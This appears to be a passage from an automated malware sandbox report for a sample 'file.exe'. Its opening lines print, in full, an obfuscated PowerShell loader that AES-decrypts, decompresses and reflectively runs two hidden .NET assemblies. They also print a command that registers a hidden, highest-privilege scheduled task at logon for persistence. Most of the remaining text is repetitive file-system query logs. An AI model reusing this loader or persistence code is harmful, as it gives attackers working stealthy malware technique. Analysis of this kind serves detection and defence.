tnioj($epehv){$iyroy=[system.security.cryptography.aes]::create();$iyroy.mode=[system.security.cryptography.ciphermode]::cbc;$iyroy.padding=[system.security.cryptography.paddingmode]::pkcs7;$iyroy.key=[system.convert]::($rtyv[8])('saaw/5aaxuahemfj4gdvf4efnk5mel+mrvinwcktw5a=');$iyroy.iv=[system.convert]::($rtyv[8])('5qrexrx1mz3ezx5v7wynkq==');$vcojp=$iyroy.($rtyv[2])();$vyqzb=$vcojp.($rtyv[3])($epehv,0,$epehv.length);$vcojp.dispose();$iyroy.dispose();$vyqzb;}function ummxi($epehv){$vtwcn=new-object system.io.memorystream(,$epehv);$wwnvp=new-object system.io.memorystream;$guujf=new-object system.io.compression.gzipstream($vtwcn,[io.compression.compressionmode]::($rtyv[11]));$guujf.($rtyv[10])($wwnvp);$guujf.dispose();$vtwcn.dispose();$wwnvp.dispose();$wwnvp.toarray();}$sqmzi=[system.io.file]::($rtyv[0])([console]::title);$fexoj=ummxi (tnioj ([convert]::($rtyv[8])([system.linq.enumerable]::($rtyv[6])($sqmzi, 
5).substring(2))));$sgtuk=ummxi (tnioj ([convert]::($rtyv[8])([system.linq.enumerable]::($rtyv[6])($sqmzi, 6).substring(2))));[system.reflection.assembly]::($rtyv[5])([byte[]]$sgtuk).($rtyv[1]).($rtyv[13])($null,$null);[system.reflection.assembly]::($rtyv[5])([byte[]]$fexoj).($rtyv[1]).($rtyv[13])($null,$null); "
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" register-scheduledtask -taskname 'onenote 64476' -trigger (new-scheduledtasktrigger -atlogon) -action (new-scheduledtaskaction -execute 'c:\users\user\appdata\roaming\network64476man.cmd') -settings (new-scheduledtasksettingsset -allowstartifonbatteries -hidden -executiontimelimit 0) -runlevel highest -force
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /s /d /c" echo $host.ui.rawui.windowtitle='c:\users\user\desktop\mhk.cmd';$rtyv='rezykvadzykvlizykvneszykv'.replace('zykv', ''),'etumkntumktrtumkypotumkitumkntumkttumk'.replace('tumk', ''),'crigeoeaigeoteigeodigeoecigeorypigeotoigeorigeo'.replace('igeo', ''),'tghdlranghdlsghdlfghdloghdlrmghdlfighdlnalghdlbghdlloghdlckghdl'.replace('ghdl', ''),'ggynuegynutgynucugynurrgynuengynutpgynurgynuocegynusgynusgynu'.replace('gynu', ''),'loalbokdlbok'.replace('lbok', ''),'elrofderofdmerofdntarofdtrofd'.replace('rofd', ''),'shhcaplihhcathhca'.replace('hhca', ''),'frolqelmblqelalqelslqelelqel6lqel4lqelstlqelrinlqelglqel'.replace('lqel', ''),'mkropainkropmkropodkropukroplekrop'.replace('krop', ''),'cocpycpytcpycocpyc'.replace('cpyc', ''),'decwuerowuermprwuereswuerswuer'.replace('wuer', ''),'chqcmhahqcmnhqcmgeehqcmxthqcmenshqcmiohqcmnhqcm'.replace('hqcm', ''),'inpsjavopsjakpsjaepsja'.replace('psja', '');powershell -w hidden;function tnioj($epehv){$iyroy=[system.security.cryptography.aes]::create();$iyroy.mode=[system.security.cryptography.ciphermode]::cbc;$iyroy.padding=[system.security.cryptography.paddingmode]::pkcs7;$iyroy.key=[system.convert]::($rtyv[8])('saaw/5aaxuahemfj4gdvf4efnk5mel+mrvinwcktw5a=');$iyroy.iv=[system.convert]::($rtyv[8])('5qrexrx1mz3ezx5v7wynkq==');$vcojp=$iyroy.($rtyv[2])();$vyqzb=$vcojp.($rtyv[3])($epehv,0,$epehv.length);$vcojp.dispose();$iyroy.dispose();$vyqzb;}function ummxi($epehv){$vtwcn=new-object system.io.memorystream(,$epehv);$wwnvp=new-object system.io.memorystream;$guujf=new-object system.io.compression.gzipstream($vtwcn,[io.compression.compressionmode]::($rtyv[11]));$guujf.($rtyv[10])($wwnvp);$guujf.dispose();$vtwcn.dispose();$wwnvp.dispose();$wwnvp.toarray();}$sqmzi=[system.io.file]::($rtyv[0])([console]::title);$fexoj=ummxi (tnioj ([convert]::($rtyv[8])([system.linq.enumerable]::($rtyv[6])($sqmzi, 5).substring(2))));$sgtuk=ummxi 
(tnioj ([convert]::($rtyv[8])([system.linq.enumerable]::($rtyv[6])($sqmzi, 6).substring(2))));[system.reflection.assembly]::($rtyv[5])([byte[]]$sgtuk).($rtyv[1]).($rtyv[13])($null,$null);[system.reflection.assembly]::($rtyv[5])([byte[]]$fexoj).($rtyv[1]).($rtyv[13])($null,$null); "
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" register-scheduledtask -taskname 'onenote 64476' -trigger (new-scheduledtasktrigger -atlogon) -action (new-scheduledtaskaction -execute 'c:\users\user\appdata\roaming\network64476man.cmd') -settings (new-scheduledtasksettingsset -allowstartifonbatteries -hidden -executiontimelimit 0) -runlevel highest -force
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /s /d /c" echo $host.ui.rawui.windowtitle='c:\users\user\appdata\roaming\network64476man.cmd';$rtyv='rezykvadzykvlizykvneszykv'.replace('zykv', ''),'etumkntumktrtumkypotumkitumkntumkttumk'.replace('tumk', ''),'crigeoeaigeoteigeodigeoecigeorypigeotoigeorigeo'.replace('igeo', ''),'tghdlranghdlsghdlfghdloghdlrmghdlfighdlnalghdlbghdlloghdlckghdl'.replace('ghdl', ''),'ggynuegynutgynucugynurrgynuengynutpgynurgynuocegynusgynusgynu'.replace('gynu', ''),'loalbokdlbok'.replace('lbok', ''),'elrofderofdmerofdntarofdtrofd'.replace('rofd', ''),'shhcaplihhcathhca'.replace('hhca', ''),'frolqelmblqelalqelslqelelqel6lqel4lqelstlqelrinlqelglqel'.replace('lqel', ''),'mkropainkropmkropodkropukroplekrop'.replace('krop', ''),'cocpycpytcpycocpyc'.replace('cpyc', ''),'decwuerowuermprwuereswuerswuer'.replace('wuer', ''),'chqcmhahqcmnhqcmgeehqcmxthqcmenshqcmiohqcmnhqcm'.replace('hqcm', ''),'inpsjavopsjakpsjaepsja'.replace('psja', '');powershell -w hidden;function tnioj($epehv){$iyroy=[system.security.cryptography.aes]::create();$iyroy.mode=[system.security.cryptography.ciphermode]::cbc;$iyroy.padding=[system.security.cryptography.paddingmode]::pkcs7;$iyroy.key=[system.convert]::($rtyv[8])('saaw/5aaxuahemfj4gdvf4efnk5mel+mrvinwcktw5a=');$iyroy.iv=[system.convert]::($rtyv[8])('5qrexrx1mz3ezx5v7wynkq==');$vcojp=$iyroy.($rtyv[2])();$vyqzb=$vcojp.($rtyv[3])($epehv,0,$epehv.length);$vcojp.dispose();$iyroy.dispose();$vyqzb;}function ummxi($epehv){$vtwcn=new-object system.io.memorystream(,$epehv);$wwnvp=new-object system.io.memorystream;$guujf=new-object system.io.compression.gzipstream($vtwcn,[io.compression.compressionmode]::($rtyv[11]));$guujf.($rtyv[10])($wwnvp);$guujf.dispose();$vtwcn.dispose();$wwnvp.dispose();$wwnvp.toarray();}$sqmzi=[system.io.file]::($rtyv[0])([console]::title);$fexoj=ummxi (tnioj ([convert]::($rtyv[8])([system.linq.enumerable]::($rtyv[6])($sqmzi, 
5).substring(2))));$sgtuk=ummxi (tnioj ([convert]::($rtyv[8])([system.linq.enumerable]::($rtyv[6])($sqmzi, 6).substring(2))));[system.reflection.assembly]::($rtyv[5])([byte[]]$sgtuk).($rtyv[1]).($rtyv[13])($null,$null);[system.reflection.assembly]::($rtyv[5])([byte[]]$fexoj).($rtyv[1]).($rtyv[13])($null,$null); "
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" register-scheduledtask -taskname 'onenote 64476' -trigger (new-scheduledtasktrigger -atlogon) -action (new-scheduledtaskaction -execute 'c:\users\user\appdata\roaming\network64476man.cmd') -settings (new-scheduledtasksettingsset -allowstartifonbatteries -hidden -executiontimelimit 0) -runlevel highest -force
    Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF65A36DBEC cpuid 0_2_00007FF65A36DBEC
    Source: C:\Users\user\Desktop\file.exe Code function: GetLocaleInfoW,GetNumberFormatW,0_2_00007FF65A37A24C
    Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
